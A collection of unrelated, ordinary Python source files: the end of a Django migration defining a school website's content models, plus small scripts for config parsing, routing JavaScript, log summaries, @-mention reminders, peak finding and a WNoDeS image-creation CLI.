name='Form_one_news_portal',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('news_title', models.CharField(max_length=200)),
('news_description', models.TextField()),
('document_file', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Form_three_classes',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Form_three_news_portal',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('news_title', models.CharField(max_length=200)),
('news_description', models.TextField()),
('document_file', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Form_two_classes',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Form_two_news_portal',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('news_title', models.CharField(max_length=200)),
('news_description', models.TextField()),
('document_file', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_alumnae',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('achievement', models.CharField(max_length=250)),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_bakery',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_biology_department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_biology_lab',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_boarding_department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_bog_chairperson',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_car_park',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_chemistry_department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_chemistry_lab',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_christian_union_club',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_computer_lab',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_cre_department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_debate_club',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_dining_hall',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_documents_downloads',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('document_name', models.CharField(max_length=200)),
('document_file', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_dp_academics',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_dp_admin',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_drama_club',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_english_department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_fence',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_foreignlanguages_department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_forest',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_games_department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_general_information',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('school_logo', models.FileField(upload_to='uploads/')),
('school_admission', models.TextField()),
('school_rules', models.TextField()),
('school_twitterlink', models.TextField(validators=[django.core.validators.URLValidator()])),
('school_facebooklink', models.TextField(validators=[django.core.validators.URLValidator()])),
('school_anthem', models.TextField()),
('school_core_values', models.TextField()),
('current_year', models.IntegerField(default=2007)),
('school_address', models.TextField()),
('school_emailaddress', models.EmailField(blank=True, max_length=70)),
('school_phone_number', models.CharField(max_length=15)),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_generator',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_geography_department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_guiding_and_counseling_department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_history',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_history_department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_journalism_club',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_kiswahili_department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_library',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_math_department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_mission',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_music_club',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_muslim_students_club',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_photo_gallery',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('description', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_physics_department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_physics_lab',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_principal',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_pta_chairperson',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_science_engineering_club',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_site_map',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_sports_club',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_technical_department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_transport',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_updates',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('news_title', models.CharField(max_length=200)),
('news_description', models.TextField()),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_view',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_vision',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
import configargparse
import os
import configparser
import yaml
import sys
sys.path.append('src/')
from cnn_photon_id_parser import set_parser
# print(parser.__dir__())
# p_yaml= configargparse.ArgParser(
# config_file_parser_class=configargparse.YAMLConfigFileParser)
# p_yaml.add('-c','--config', is_config_file=True)
# p_yaml.add('-gO','--G_OutDir',type=yaml.safe_load,required=True)
# # p_yaml.add('-IO','--IOdirs',type=yaml.safe_load,action="append")
# # p_yaml.add('-InDir_DP',required=False)
# p_yaml.add('-metrics','--Metrics',type=yaml.safe_load)
p_ini = configargparse.ArgParser(
config_file_parser_class=configargparse.ConfigparserConfigFileParser
)
p_ini.add('-c','--config',is_config_file=True)
# p_ini.add('-gO','--IOdirs')
# p_ini.add('--g_outdir')
p_ini.add('--g_outdir',env_var='GLOBAL_OUTDIR')
# IF EXPECTED ARG IS A DICT THEN, ADD IT WITH `add_argument` and add `type=yaml.safe_load`
p_ini.add_argument('--metrics',type=yaml.safe_load)
# p_ini.add('-metrics','--Metrics')
def main(argv):
args = set_parser()
# args = p_yaml.parse_args()
print(args)
print("train out is ", args.train_out)
print("train out is ", type(args.train_out))
print("train out is is false?", args.train_out is False)
print("train out is is None?", args.train_out is None)
print("train out exists?", os.path.exists(args.train_out))
# args = p_ini.parse_args()
# print(args)
# print(os.path.exists(args.g_outdir))
# print(os.path.exists(args.IOdirs))
# cfg = configparser.ConfigParser()
# cfg.read('config.ini')
# print(cfg.sections())
# print(os.path.exists(cfg['IOdirs']['G_OutDir']))
# print(type(args.IOdirs))
# print(type(args.IOdirs['DataProcessing_OUT']))
# print(args.IOdirs.items())
# args=p_ini.parse_args()
# print(args)
# cfg = args.config.ConfigParser()
# print(cfg)
# print(args['IOdirs'])
return
if __name__ == '__main__':
main(sys.argv[1:])
|
from django import http
from functions import get_routing_js
def routing_js(request):
"""
View to render routing js.
SHOULD NOT BE USED IN PRODUCTION
"""
response = http.HttpResponse(get_routing_js())
response['Content-Type'] = 'application/javascript'
return response
|
#!/usr/bin/env python
import sys
import glob
def handle_dir(dirname):
for f in sorted(glob.glob(dirname + "/*.log")):
# scen total-time 0.0 max-time-step 0.0 time-20-moves 0.0 total-len 0.0 subopt 0.0 valid
num_lines = 0
time = 0
subopt = 1
for line in open(f):
tokens = line.strip().split("\t")
if len(tokens) == 12:
time += float(tokens[2])
subopt += float(tokens[10])
assert tokens[11] == "valid", tokens[11]
num_lines += 1
print f, num_lines
print "total time: ", round(time, 1)
print "geo mean(subopt): ", round(subopt / num_lines, 2)
handle_dir(sys.argv[1])
|
from .texture import BaseTexture, Material
from .decompress_ import decompress
from . import file_object, mesh, file_readers
|
#!/usr/bin/env python
# encoding: utf-8
"""
reminder.py
Created by yang.zhou on 2012-09-29.
Copyright (c) 2012 zhouyang.me. All rights reserved.
"""
import re
import logging
from rq import Queue
from redis import Redis
from models import Member, Reminder
from oauth2lib import message_request
def get_usernames(content):
names_list =re.findall(ur"@[0-9a-zA-Z\u4e00-\u9fa5_#]{1,18}\s", content)
return [username[1:-1] for username in names_list]
def create_mention(**kwargs):
receiver = Member.getMemberByUsername(kwargs['username'])
if receiver:
kwargs.update(receiver=receiver)
reminder = Reminder.create(**kwargs)
else:
logging.error("no member found")
def send_mentions(**kwargs):
q = Queue(connection=Redis(), async=False)
r = q.enqueue_call(func=create_mention, kwargs=kwargs, timeout=40)
return r
|
#!/usr/bin/python3
# function that finds a peak in a list of unsorted integers.
def aux(list_of_integers, first, last):
""" recursive auxiliary function """
x = last - first
if x == 1:
if list_of_integers[first] > list_of_integers[last]:
return first
else:
return last
middle = first + x // 2
if list_of_integers[middle] < list_of_integers[middle + 1]:
return aux(list_of_integers, middle, last)
return aux(list_of_integers, first, middle)
def find_peak(list_of_integers):
""" function that finds a peak in a list of unsorted integers """
if len(list_of_integers) == 0:
return None
return list_of_integers[aux(
list_of_integers, 0, len(list_of_integers) - 1)]
|
#!/usr/bin/python
#------------------------------------------------------------------------------
# Copyright 2008-2012 Istituto Nazionale di Fisica Nucleare (INFN)
#
# Licensed under the EUPL, Version 1.1 only (the "Licence").
# You may not use this work except in compliance with the Licence.
# You may obtain a copy of the Licence at:
#
# http://joinup.ec.europa.eu/system/files/EN/EUPL%20v.1.1%20-%20Licence.pdf
#
# Unless required by applicable law or agreed to in
# writing, software distributed under the Licence is
# distributed on an "AS IS" basis,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied.
# See the Licence for the specific language governing
# permissions and limitations under the Licence.
#------------------------------------------------------------------------------
import os
import getopt
import sys
from wnodes.cli.utils import load_config
from wnodes.cli.utils import get_config
from wnodes.cli.utils import checks
from wnodes.cli.commands import errors
from wnodes.cli.commands import create_occi
class CreateImage:
'''A command-line program to create a given image.'''
def __init__(self):
self.verbose = False
self.parameters = {'size':'small',
'number':1,
'tag':'',
'conf':(False,'wnodes-cli.cfg')}
def __usage(self):
print ("Usage: wnodes_create_image [OPTION] -t IMAGE_NAME\n"+
"Request to instantiate a set of images with the same characteristic\n\n"+
"OPTION\n"+
" -t,--imagetag=IMAGE_NAME specifies the image tag name. It is\n"+
" mandatory.\n"+
" -s,--imagesize=SIZE specifies the size of the image.\n"+
" Supported values are:\n"+
" - small\n"+
" - medium\n"+
" - large\n"+
" - extralarge\n"+
" Please look at System Guide doc for\n"+
" more information. The default of\n"+
" which is %s.\n"
% self.parameters['size'] +
" --vo=VO_NAME specifies the vo name.\n"+
" -b, --number=NUMBER specifies how many times the specified\n"
" image must be created. The default of\n"+
" which is %s.\n"
% str(self.parameters['number']) +
" -c, --conf=CONF_FILE specifies a customized conf filename.\n"+
" --verbose show verbose information. The\n"+
" default of which is %s.\n"
% self.verbose +
" -h, --help display this help and exit.\n"+
" -v, --version output version information and exit.\n")
